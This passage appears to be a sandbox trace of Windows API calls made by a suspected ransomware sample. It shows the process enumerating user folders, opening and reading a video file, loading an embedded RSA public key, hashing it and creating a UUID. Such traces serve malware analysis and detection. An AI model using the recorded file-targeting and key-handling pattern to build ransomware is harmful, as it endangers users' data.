ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0237.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.118] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0237.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.118] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0237.118] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.118] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0237.118] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.118] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.119] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.119] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.119] PathFindFileNameW (pszPath="") returned="" [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.119] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0237.119] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.119] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.119] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.120] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.120] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.120] PathFindFileNameW (pszPath="") returned="" [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0237.120] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.120] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.120] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.120] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.120] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.120] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.120] PathFindFileNameW (pszPath="") returned="" [0237.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0237.121] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0237.121] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.121] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0237.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.121] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.121] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.121] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.121] PathFindFileNameW (pszPath="") returned="" [0237.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3959ed0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3959ed0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.122] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3959ed0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3959ed0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.122] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5ceb1d0, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x342d30a0, ftLastAccessTime.dwHighDateTime=0x1d5b5e6, ftLastWriteTime.dwLowDateTime=0x342d30a0, ftLastWriteTime.dwHighDateTime=0x1d5b5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2 M12KpqJt__Iy", cAlternateFileName="2M12KP~1")) returned 1 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x310) returned 0x3b947f8 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cf80 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cfe8 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cf18 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f7c0 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fb08 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fb80 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fbf8 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fc70 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fce8 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fd60 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a5d8 [0237.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fdd8 [0237.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fe50 [0237.123] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0237.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0237.123] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0237.123] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x531e0c40, ftCreationTime.dwHighDateTime=0x1d5bed4, ftLastAccessTime.dwLowDateTime=0x717cf40, ftLastAccessTime.dwHighDateTime=0x1d5c16b, ftLastWriteTime.dwLowDateTime=0x717cf40, ftLastWriteTime.dwHighDateTime=0x1d5c16b, nFileSizeHigh=0x0, nFileSizeLow=0x18c54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FA42ucFZ7btbWqUgPC.flv", cAlternateFileName="FA42UC~1.FLV")) returned 1 [0237.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a660 [0237.123] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FA42ucFZ7btbWqUgPC.flv") returned=".flv" [0237.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FA42ucFZ7btbWqUgPC.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fa42ucfz7btbwqugpc.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.123] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=101460) returned 1 [0237.123] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.126] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18c2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.126] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.128] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.129] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x18c54, lpOverlapped=0x0) returned 1 [0237.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.130] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.131] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.131] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.131] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.131] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.131] GetLastError () returned 0x0 [0237.131] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.131] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.131] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.131] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.132] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.132] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0237.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0237.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0237.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004d0 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004d0 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34004b8 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004d0 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.134] GetCurrentThreadId () returned 0x5b4 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79df8 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.134] GetCurrentThreadId () returned 0x5b4 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.135] HeapFree (in: 